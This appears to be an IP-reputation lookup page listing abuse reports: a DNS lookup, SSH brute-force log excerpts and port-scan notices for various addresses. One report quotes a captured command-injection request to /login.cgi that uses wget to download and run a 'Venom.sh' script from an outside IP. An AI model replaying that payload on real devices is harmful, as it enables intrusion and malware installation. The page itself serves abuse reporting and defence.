City: unknown
Region: unknown
Country: United States
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
| IP | Type | Details | Datetime |
|---|---|---|---|
| 142.93.207.23 | attack | trying to access non-authorized port |
2020-06-19 04:00:08 |
| 142.93.207.14 | attackspam | Feb 13 23:02:44 pi sshd[28431]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.207.14 user=root Feb 13 23:02:46 pi sshd[28431]: Failed password for invalid user root from 142.93.207.14 port 47466 ssh2 |
2020-03-14 02:32:50 |
| 142.93.207.14 | attack | Feb 13 23:02:44 pi sshd[28431]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.207.14 user=root Feb 13 23:02:46 pi sshd[28431]: Failed password for invalid user root from 142.93.207.14 port 47466 ssh2 |
2020-02-14 09:54:57 |
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 142.93.207.141
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 60166
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;142.93.207.141. IN A
;; AUTHORITY SECTION:
. 3600 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2019071001 1800 900 604800 86400
;; Query time: 3 msec
;; SERVER: 67.207.67.2#53(67.207.67.2)
;; WHEN: Thu Jul 11 05:00:31 CST 2019
;; MSG SIZE rcvd: 118Host 141.207.93.142.in-addr.arpa. not found: 3(NXDOMAIN)Server: 67.207.67.2
Address: 67.207.67.2#53
** server can't find 141.207.93.142.in-addr.arpa: NXDOMAIN| IP | Type | Details | Datetime |
|---|---|---|---|
| 69.63.73.189 | attackspam | Unauthorized connection attempt detected from IP address 69.63.73.189 to port 445 |
2019-12-24 04:49:55 |
| 192.3.177.213 | attackspambots | Dec 23 05:50:50 sachi sshd\[2059\]: Invalid user johandar from 192.3.177.213 Dec 23 05:50:50 sachi sshd\[2059\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.3.177.213 Dec 23 05:50:52 sachi sshd\[2059\]: Failed password for invalid user johandar from 192.3.177.213 port 48024 ssh2 Dec 23 05:56:06 sachi sshd\[2515\]: Invalid user edmxtest from 192.3.177.213 Dec 23 05:56:06 sachi sshd\[2515\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.3.177.213 |
2019-12-24 04:45:42 |
| 151.236.12.185 | attack | 22/tcp 22/tcp 22/tcp... [2019-12-12/23]4pkt,1pt.(tcp) |
2019-12-24 04:51:57 |
| 156.208.164.229 | attackbots | C2,DEF GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ |
2019-12-24 04:41:21 |
| 115.231.72.28 | attack | 445/tcp 1433/tcp... [2019-10-26/12-23]9pkt,2pt.(tcp) |
2019-12-24 04:45:13 |
| 185.153.208.26 | attackbots | Dec 23 16:57:23 MK-Soft-VM7 sshd[29479]: Failed password for nobody from 185.153.208.26 port 44858 ssh2 Dec 23 17:02:13 MK-Soft-VM7 sshd[29495]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=185.153.208.26 ... |
2019-12-24 04:50:24 |
| 123.30.179.215 | attackbots | MultiHost/MultiPort Probe, Scan, Hack - |
2019-12-24 04:25:42 |
| 139.162.90.220 | attack | MultiHost/MultiPort Probe, Scan, Hack - |
2019-12-24 04:51:02 |
| 129.204.194.146 | attackspambots | Oct 31 15:08:59 yesfletchmain sshd\[6430\]: Invalid user suherman from 129.204.194.146 port 59374 Oct 31 15:09:00 yesfletchmain sshd\[6430\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.204.194.146 Oct 31 15:09:01 yesfletchmain sshd\[6430\]: Failed password for invalid user suherman from 129.204.194.146 port 59374 ssh2 Oct 31 15:15:01 yesfletchmain sshd\[6816\]: Invalid user attack from 129.204.194.146 port 41816 Oct 31 15:15:01 yesfletchmain sshd\[6816\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.204.194.146 ... |
2019-12-24 04:23:18 |
| 129.204.173.145 | attackspam | Feb 13 07:45:55 dillonfme sshd\[31394\]: Invalid user teste from 129.204.173.145 port 38930 Feb 13 07:45:55 dillonfme sshd\[31394\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.204.173.145 Feb 13 07:45:57 dillonfme sshd\[31394\]: Failed password for invalid user teste from 129.204.173.145 port 38930 ssh2 Feb 13 07:52:58 dillonfme sshd\[31665\]: Invalid user joel from 129.204.173.145 port 58508 Feb 13 07:52:58 dillonfme sshd\[31665\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.204.173.145 ... |
2019-12-24 04:26:59 |
| 183.62.139.167 | attackspam | Invalid user jboss from 183.62.139.167 port 42632 |
2019-12-24 04:51:32 |
| 195.154.226.126 | attackbots | 5070/udp 5070/udp 5070/udp... [2019-12-12/23]5pkt,1pt.(udp) |
2019-12-24 04:35:17 |
| 51.75.128.184 | attackbots | Dec 23 16:57:35 sd-53420 sshd\[8452\]: Invalid user pau from 51.75.128.184 Dec 23 16:57:35 sd-53420 sshd\[8452\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.75.128.184 Dec 23 16:57:37 sd-53420 sshd\[8452\]: Failed password for invalid user pau from 51.75.128.184 port 56798 ssh2 Dec 23 17:03:09 sd-53420 sshd\[10539\]: User backup from 51.75.128.184 not allowed because none of user's groups are listed in AllowGroups Dec 23 17:03:09 sd-53420 sshd\[10539\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=51.75.128.184 user=backup ... |
2019-12-24 04:43:01 |
| 218.92.0.171 | attackbotsspam | Dec 23 21:16:53 vps691689 sshd[807]: Failed password for root from 218.92.0.171 port 5679 ssh2 Dec 23 21:17:03 vps691689 sshd[807]: Failed password for root from 218.92.0.171 port 5679 ssh2 Dec 23 21:17:06 vps691689 sshd[807]: Failed password for root from 218.92.0.171 port 5679 ssh2 Dec 23 21:17:06 vps691689 sshd[807]: error: maximum authentication attempts exceeded for root from 218.92.0.171 port 5679 ssh2 [preauth] ... |
2019-12-24 04:26:45 |
| 124.65.18.102 | attack | Scanning random ports - tries to find possible vulnerable services |
2019-12-24 04:27:19 |